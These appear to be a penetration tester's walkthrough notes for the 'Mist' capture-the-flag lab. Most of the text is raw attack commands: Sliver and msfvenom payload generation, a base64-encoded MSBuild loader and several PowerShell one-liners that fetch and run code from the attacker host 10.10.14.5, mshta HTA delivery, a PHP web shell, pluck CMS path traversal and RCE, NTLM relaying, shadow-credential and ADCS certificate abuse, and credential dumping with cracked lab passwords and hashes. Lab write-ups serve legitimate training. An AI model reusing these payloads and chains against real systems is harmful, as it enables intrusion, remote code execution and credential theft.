Mist

Sliver

https -L 10.10.14.5 -l 443

profiles new -b https://10.10.14.5:443 --format shellcode --arch amd64 mist

stage-listener --url https://10.10.14.5:8448 --profile mist --prepend-size

msfvenom -p windows/x64/custom/reverse_winhttps LHOST=10.10.14.5 LPORT=8448 LURI=/hello.woff -f csharp -o payload

cp ~/sliver_files/new.ps1 .

cat payload

code new.ps1

cp sliver64.xml .

Change the ip and the file name

base64 -w 0 sliver64.xml > sliver_base64.txt

PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPgogIDwhLS0gVGhpcyBpbmxpbmUgdGFzayBleGVjdXRlcyBjIyBjb2RlLiAtLT4KICA8IS0tIEM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcms2NFx2NC4wLjMwMzE5XG1zYnVpbGQuZXhlIHBzaGVsbC54bWwgLS0+CiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4KICA8IS0tIExpY2Vuc2U6IEJTRCAzLUNsYXVzZSAtLT4KICA8VGFyZ2V0IE5hbWU9IkhlbGxvIj4KICAgPEZyYWdtZW50RXhhbXBsZSAvPgogICA8Q2xhc3NFeGFtcGxlIC8+CiAgPC9UYXJnZXQ+CiAgPFVzaW5nVGFzawogICAgVGFza05hbWU9IkZyYWdtZW50RXhhbXBsZSIKICAgIFRhc2tGYWN0b3J5PSJDb2RlVGFza0ZhY3RvcnkiCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4KICAgIDxQYXJhbWV0ZXJHcm91cC8+CiAgICA8VGFzaz4KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPgogICAgICA8VXNpbmcgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iIC8+CiAgICAgIDxDb2RlIFR5cGU9IkZyYWdtZW50IiBMYW5ndWFnZT0iY3MiPgogICAgICAgIDwhW0NEQVRBWwogICAgICAgICAgICAgICAgQ29uc29sZS5Xcml0ZUxpbmUoIkhlbGxvIEZyb20gRnJhZ21lbnQiKTsKICAgICAgICBdXT4KICAgICAgPC9Db2RlPgogICAgPC9UYXNrPgogICAgPC9Vc2luZ1Rhc2s+CiAgICA8VXNpbmdUYXNrCiAgICBUYXNrTmFtZT0iQ2xhc3NFeGFtcGxlIgogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSIKICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPgogICAgPFRhc2s+CiAgICAgIDxSZWZlcmVuY2UgSW5jbHVkZT0iU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbiIgLz4KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+CiAgICAgICAgPCFbQ0RBVEFbCgogICAgICAgICAgICB1c2luZyBTeXN0ZW07CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkRpYWdub3N0aWNzOwogICAgICAgICAgICB1c2luZyBTeXN0ZW0uUmVmbGVjdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwogICAgICAgICAgICAvL0FkZCBGb3IgUG93ZXJTaGVsbCBJbnZvY2F0aW9uCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2RlbDsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5SdW5zcGFjZXM7CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5UZXh0OwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuVXRpbGl0aWVzOwoKICAgICAgICAgICAgcHVibGljIGNsYXNzIENsYXNzRXhhbXBsZSA6ICBUYXNrLCBJVGFzawogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBTdHJpbmcgY21kID0gQCIoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEwLjEwLjE0LjUvbmV3LnBzMScpIHwgaWV4IjsKICAgICAgICAgICAgUnVuc3BhY2UgcnMgPSBSdW5zcGFjZUZhY3RvcnkuQ3JlYXRlUnVuc3BhY2UoKTsKICAgICAgICAgICAgcnMuT3BlbigpOwogICAgICAgICAgICBQb3dlclNoZWxsIHBzID0gUG93ZXJTaGVsbC5DcmVhdGUoKTsKICAgICAgICAgICAgcHMuUnVuc3BhY2UgPSByczsKICAgICAgICAgICAgcHMuQWRkU2NyaXB0KGNtZCk7CiAgICAgICAgICAgIHBzLkludm9rZSgpOwogICAgICAgICAgICBycy5DbG9zZSgpOwogICAgICAgICAgICByZXR1cm4gdHJ1ZTsKCgogICAgICAgICAgICAgICAgfQoKCiAgICAgICAgICAgIH0KCgoKCiAgICAgICAgXV0+CiAgICAgIDwvQ29kZT4KICAgIDwvVGFzaz4KICA8L1VzaW5nVGFzaz4KPC9Qcm9qZWN0Pgo=

Pasted this in sliver hta file and created shortcut with name Notepad.lnk as these were the applications in the folder

C:\Windows\System32\mshta.exe http://10.10.14.5/sliver64.hta

I then uploaded the Notepad.lnk in the same folder

Got shell

Shell as Brandon.Keywarp

uplaod SharpHound.exe

shell

./SharpHound.exe -c All

download 20240717024504_BloodHound.zip

Getting Shells

(New-Object System.Net.WebClient).DownloadString('http://10.10.14.5/new.ps1') | IEX

EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "iwr -Uri ''http://10.10.14.5/large1.ps1'' -UseBasicParsing | iex"';

powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://10.10.14.5:80/new.ps1%27)%22

powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.5:80/new.ps1')"

 nxc smb mucdc.heron.vl -u _admin --use-kcache -X "(New-Object System.Net.WebClient).DownloadString('http://10.10.14.5/new.ps1') | IEX"

Enumeration

We start with a normal nmap scan.

sudo nmap -sC -sV -oA mist 10.10.11.17 -T4

nmap_results mist.nmap

Port	Service	Version
80	http	Apache httpd 2.4.52

Nmap Results

http://10.10.11.17/?file=mist
/data/
/docs/
pluck 4.7.18
OpenSSL/1.1.1m
Apache/2.4.52

pluck is very old

We search for the known exploits for pluck 4.7.18 with searchsploit

searchsploit pluck

Found RCE for this version

pyhthon rce file

We now mirror the exploit to see what it is doing.

searchsploit -m  php/webapps/51592.py

The exploit upload a malicious zip file with php rev shell in it. But the exploit is authenticated and we don’t have a password.

Now we try to perform directory enumeration.

There were to many directories found in feroxbuster so I again search for important directories on google and came across another exploit.

https://www.exploit-db.com/exploits/36129

It was not relevant to our thing but we get a directory

After trying two three possible ways we found

Again looking further we found

https://security.szurek.pl/en/pluck-cms-472-path-traversal/

http://pluck-url/data/modules/albums/albums_getimage.php?image=thumb/../../../../settings/langpref.php

We combine all this

Request

Response

<?php
$ww = 'c81dde783f9543114ecd9fa14e8440a2a868bfe0bacdf14d29fce0605c09d5a2bcd2028d0d7a3fa805573d074faa15d6361f44aec9a6efe18b754b3c265ce81e';
?>146

Chatgpt told u

The given hash is 128 characters long, which is typical for SHA-512.

 hashcat -m 1700 hash.txt ../../vulnlab/heron/rockyou.txt

Hash Cracked

The password we found is

lexypoo97

Let’s try to login with this password.

Successful login

We were successfully able to login to the pluck cms.

As we are authenticated user we try to exploit we found earlier for the RCE.

we need to modify the script to add the password.

We first need a php shell

vim shell.php

php shell windows

<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
}
?>

http://10.10.11.17/data/modules/shell3/shell3.php?cmd=powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://10.10.14.5:80/new.ps1%27)%22

Got the shell on sliver

execute-assembly /home/jay/htb/mist/Certify.exe request /ca:DC01.mist.htb\\mist-DC01-CA /template:User

 openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

With empty password

After setting up ligolo on MS01 we perform following command

Scanning the network

certipy auth -pfx cert.pfx -u brandon.keywarp -domain mist.htb -dc-ip 192.168.100.100 -debug

hash of brandon user

Got hash for 'brandon.keywarp@mist.htb': aad3b435b51404eeaad3b435b51404ee:db03d6a77a2205bc1d07082740626cc9

WEBDAV try

i added the DC01 into /etc/resolv.conf

I tried this but now enough access rights.

 python3 dnstool.py -u 'mist.htb\brandon.keywarp' DC01.mist.htb --tcp -p aad3b435b51404eeaad3b435b51404ee:db03d6a77a2205bc1d07082740626cc9 -a add -t A -r hacksafely.mist.htb -d 10.10.14.5

ntlmrelayx.py -t ldap://DC01.mist.htb --http-port 8080 --delegate-access --no-dump --no-acl --no-da

Webdav

We check on MS01 if webclient is runnig but that is not the case.

net use h: http://10.10.14.5/bulb

sudo responder -I tun0 -A

Get-Service WebClient

./GetWebDAVStatus.exe 127.0.0.1

Now it's running

Unmanaged Powershell Sliver

https://github.com/mmnoureldin/UnmanagedPowerShell/tree/master

We downloaded and compiled the UnmangedPowershell.exe

then used donut to have it as shellcode file

./donut -i /home/jay/htb/mist/UnmanagedPowerShell.exe -o /home/jay/htb/mist/powershell.bin

execute-shellcode -i powershell.bin

powershell interactive

New-ADIDNSNode -Tombstone -Verbose -Node hacksafely.mist.htb -Data 10.10.14.5

 rportfwd add -b 8888 -r 10.10.14.5:8888

WEBDAV to LDAP Realying

On attacker machine

sudo responder -I tun0 -A

starting rport forward

On machine running WEBDAV as svc_web

Get-Service WebClient

net use * http://10.10.14.5/webdav

Sliver shell of that machine using brandon shell

rportfwd add -b 8888 -r 10.10.14.5:8888

On attacker Machine

It’s in htb/mist/impacket

 source .venv/bin/activate

./examples/ntlmrelayx.py -t ldaps://DC01.mist.htb --http-port 8888 --shadow-credentials --shadow-target 'MS01$' -i

It nees to be lsarpc pipe

ntlmrelayx.py -t ldaps://DC01.mist.htb --http-port 8888 --shadow-credentials --shadow-target 'MS01$' -i

coercer coerce -u brandon.keywarp --hashes :db03d6a77a2205bc1d07082740626cc9 -d mist.htb -l "MS01@8888/e" -t 192.168.100.101 --auth-type http

git clone https://github.com/fortra/impacket/ && cd impacket  

git fetch origin pull/1402/head:mist &&  git checkout mist  

python  -m venv .venv &&  source .venv/bin/activate  

pip install && pip install -r requirements.txt && pip install pyOpenSSL==24.0.0

nc 127.0.0.1 11001

clear_shadow_creds ms01$

set_shadow_creds ms01$

certipy cert -pfx zmiYN0ah.pfx -password xBL0jnagv6CuySU2PM2Q -export -out ms01.pfx

certipy auth -pfx ms01.pfx -dc-ip 192.168.100.100  -username MS01 -domain mist.htb

Got ms01 hash

 Got hash for 'ms01@mist.htb': aad3b435b51404eeaad3b435b51404ee:057697ab6d6b85dc0f7eb5182b067c75

aad3b435b51404eeaad3b435b51404ee:233291a120842834aca3e76bcd457a70:

ms01.ccache

aad3b435b51404eeaad3b435b51404ee:057697ab6d6b85dc0f7eb5182b067c75

 getST.py -self -impersonate "Administrator" -altservice "cifs/ms01.mist.htb" -k -no-pass -dc-ip 192.168.100.100 mist.htb/'ms01$'

nxc smb MS01.mist.htb --use-kcache --lsa

svc_web:MostSavagePasswordEver123

secretsdump.py -k MS01.mist.htb

[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:711e6a685af1c31c4029c3c7681dd97b:::

nxc smb MS01.mist.htb --use-kcache -X "mshta.exe http://10.10.14.5/sliver64.hta"

45bd22e2fdec7c3726790903a156f732

We found Image file in the pictures.
the 14 characters of password were found UA7cpa[#1!_*ZX.
We needed one more character.

if we have initial password like UA7cpa[#1!_*ZX?a here we were not sure about the last character so I added ?a which is all ascii characters.

we save this like pass.txt

hashcat -a 3 -m 13400 try2.txt  pass.txt

UA7cpa[#1!_*ZX@

So now we have the master password for the keypass database.

ImTiredOfThisJob:(

Password spray with all users.

 nxc smb DC01.mist.htb -u users.txt -p passwords.txt --continue-on-success

Now let’s see what op sharon can do in blood hound.

Member of Operatives group which is part of Remote Management Users

User op_sharon.Mullard can read GMSA password.

ReadGMSA password

 nxc ldap DC01.mist.htb -u op_sharon.mullard -p 'ImTiredOfThisJob:(' --gmsa

svc_ca$

132af7136478f26a1b227d08a508a526

User svc_ca$ is member of managed service account and certificate services group

We can AddKeyCredentialLink so we can perform here shadow credential attack.

Shadow Credential Attack

pywhisker.py -d "mist.htb" -u "svc_ca$" -H 132af7136478f26a1b227d08a508a526 --target "svc_cabackup" --action "add" -e pfx

certipy cert -pfx LxLvZ6SN.pfx -password fc3Am4EXoCY2hKxV3ZBe -export -out svc_cabackup.pfx

certipy auth -pfx svc_cabackup.pfx -dc-ip 192.168.100.100  -username MS01 -domain mist.htb

svc hash

Got hash for 'svc_cabackup@mist.htb': aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64

Now let’s see what svc_cabackup can do.

ADCS attack

certipy find -username 'svc_cabackup'@mist.htb -hashes c9872f1bc10bdd522c12fc2ac9041b64 -target DC01.mist.htb -dc-ip 192.168.100.100  -debug -ldap-channel-binding -old-bloodhound

certipy req  -username 'svc_cabackup' -hashes c9872f1bc10bdd522c12fc2ac9041b64 -ca 'mist-DC01-CA' -template 'ManagerAuthentication' -upn 'svc_cabackup@mist.htb' -dc-ip 192.168.100.100 -key-size 4096 -debug

certipy auth -pfx svc_cabackup.pfx -dc-ip 192.168.100.100  -username svc_cabackup -domain mist.htb

export KRB5CCNAME=svc_cabackup.ccache

certipy req -k -no-pass -username 'svc_cabackup' -hashes c9872f1bc10bdd522c12fc2ac9041b64 -ca 'mist-DC01-CA' -template 'BackupSvcAuthentication' -upn 'svc_cabackup@mist.htb' -key-size 4096 -target DC01.mist.htb -debug

certipy auth -pfx svc_cabackup.pfx -dc-ip 192.168.100.100  -username svc_cabackup -domain mist.htb

 smbserver.py share . -smb2support

reg.py -k -no-pass 'mist.htb/svc_cabackup'@Dc01.mist.htb backup -o '\\10.10.14.5\share'

secretsdump.py -system SYSTEM.save -sam SAM.save -security SECURITY.save LOCAL

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:e768c4cf883a87ba9e96278990292260

 getST.py -self -impersonate "Administrator" -altservice "cifs/DC01.mist.htb" -k -no-pass -dc-ip 192.168.100.100 mist.htb/'DC01$' -hashes e768c4cf883a87ba9e96278990292260

 nxc smb DC01.mist.htb --use-kcache -X "mshta.exe http://10.10.14.5/sliver64.hta"

d9f20fd90a7c8670b02bef3153415e82

Malleum Knowledge Base

Explorer